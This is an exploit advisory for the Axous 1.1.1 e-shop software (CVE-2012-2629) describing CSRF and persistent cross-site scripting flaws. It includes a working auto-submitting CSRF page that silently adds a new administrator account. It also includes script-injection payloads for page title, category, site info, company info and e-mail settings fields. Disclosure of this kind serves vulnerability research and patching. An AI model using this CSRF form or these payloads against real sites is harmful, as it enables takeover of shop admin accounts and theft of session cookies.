+-----------------------------------------------------------------------------------------------------------+ # Exploit Title : Axous 1.1.1 Multiple Vulnerabilities (CSRF - Persistent XSS) # Date : 30-04-2012 # Author : Ivano Binetti (http://www.ivanobinetti.com) # Software link : http://www.axous.com/get.php?pid=1 # Vendor site : http://www.axous.com/ # Version : 1.1.1 (and lower) # Tested on : Debian Squeeze (6.0) # CVE : CVE-2012-2629 # Original Advisory : http://www.webapp-security.com/2012/05/axous-1-1-1-multiple-vulnerabilities-csrf-persistent-xss/ +-----------------------------------------------------------------------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 2.1 CSRF 2.2 Persistent XSS 3)Exploit 3.1 Exploit CSRF (Add admin) 3.2 Exploit Persistent XSS 3.2.1 Exploit "page_title" 3.2.2 Exploit "category_name[1]" 3.2.3 Exploit "site_name", "seo_title" and "meta_keywords" 3.2.4 Exploit "company_name", "address1", "address2", "city", "state", "country", "author_first_name", "author_last_name", "author_email", etc 3.2.5 Exploit "system_email", "sender_name", "smtp_server", "smtp_username", "smtp_password", "order_notice_email" +-----------------------------------------------------------------------------------------------------------+ 1)Introduction Axous "is an e-shop system for software venders. With Axous, you can setup a professional software site, start selling your product with PayPal ExpressCheckout, and send regcode to your customers automaticly in 5 minutes". 2)Vulnerability Description 2.1 CSRF Axous 1.1.1 (And below) suffers from multiple CSRF vulnerabilities which could allow an attacker to change any parameters when an authenticated user/admin browses a special crafted web page. In this Advisory I will only demonstrate how to add a new administrator but, with little modifications to my exploit, you can modify any Axous's parameters, as Axous does not use an anti-CSRF token. 2.2 Persistent XSS Axous 1.1.1 (and below) is prone to multiple persistent XSS vulnerabilities due to an improper input sanitization of the following parameters: - "page_title" passed to server side logic (path: "admin/content_pages_edit.php") via http POST method. Exploiting "page_title" parameter an authenticated administrator could insert arbitrary code in "Title" field, and execute it when another administrator clicks on "Pages" link or on that specific pages under "Title" menu. Furthermore injected code will generate a persistent XSS for all unauthenticated users visiting that web page. - "category_name[1]" passed to server side logic (path:"admin/products_category.php") via http POST method. Exploiting "category_name[1]" parameter an administrator could insert arbitrary code in "Category" field (under "Control Panel > Products") and create a persistent XSS for another administrator who clicks on the "Add New" button (always under "Control Panel > Products"). -"site_name", "seo_title" and "meta_keywords" parameters passed to "admin/settings_siteinfo.php" script via http POST method. Exploiting these parameters an authenticated administrator could insert arbitrary code and create a persistent XSS for another administrator who clicks "Site info" link under Settings menu. - "company_name", "address1", "address2", "city", "state", "country", "author_first_name", "author_last_name", "author_email", "contact_first_name", "contact_last_name", "contact_email", "general_email", "general_phone", "general_fax", "sales_email", "sales_phone", "support_email", "support_phone" passed to "admin/settings_company.php" script via http POST method. Exploiting these parameters an authenticated administrator could insert arbitrary code and create a persistent XSS for another administrator who visits that injected menu. - "system_email", "sender_name", "smtp_server", "smtp_username", "smtp_password", "order_notice_email" parameters passed to "admin/settings_email.php" via httl POSt method. Exploiting these parameters an authenticated administrator could insert arbitrary code and create a persistent XSS for another administrator who clicks "Site info" link under Settings menu. Other parameters could be injected! 3)Exploit 3.1 Exploit CSRF (Add admin) <html> <body onload="javascript:document.forms[0].submit()"> <form method="POST" name="form0" action="http://<ip_address>:80/admin/administrators_add.php"> <input type="hidden" name="user_name" value="newadmin"/> <input type="hidden" name="new_passwd" value="newpassword"/> <input type="hidden" name="new_passwd1" value="newpassword"/> <input type="hidden" name="email" value="newemail@email.com"/> <input type="hidden" name="dosubmit" value="1"/> <input type="hidden" name="id" value=""/> <input type="hidden" name="action" value="addnew"/> </form> </body> </html> 3.2 Exploit Persistent XSS 3.2.1 Exploit "page_title" Insert the following code in "Title" field under "Edit page" section: Page_Title<script>alert(document.cookie)</script> 3.2.2 Exploit "category_name[1]" Insert the following code in "Category" field under "Control Panel > Products" section: <script>alert(document.cookie)</script> 3.2.3 Exploit "site_name", "seo_title" and "meta_keywords" Insert the following code in "Site name" filed under "Control Panel > Settings": "/><script>alert("XSS")</script> 3.2.4 Exploit "company_name", "address1", "address2", "city", "state", "country", "author_first_name", "author_last_name", "author_email", etc Insert the following code in all fields under "Control Panel > Settings > Company info": "/><script>alert("XSS")</script> 3.2.5 Exploit "system_email", "sender_name", "smtp_server", "smtp_username", "smtp_password", "order_notice_email" Insert the following code in all fields under "Control Panel > Settings > E-mail Settings": "/><script>alert("XSS")</script> +-----------------------------------------------------------------------------------------------------------+Брой прочитания на тази страница: 1273
Axous 1.1.1 Multiple Vulnerabilities (CSRF – Persistent XSS)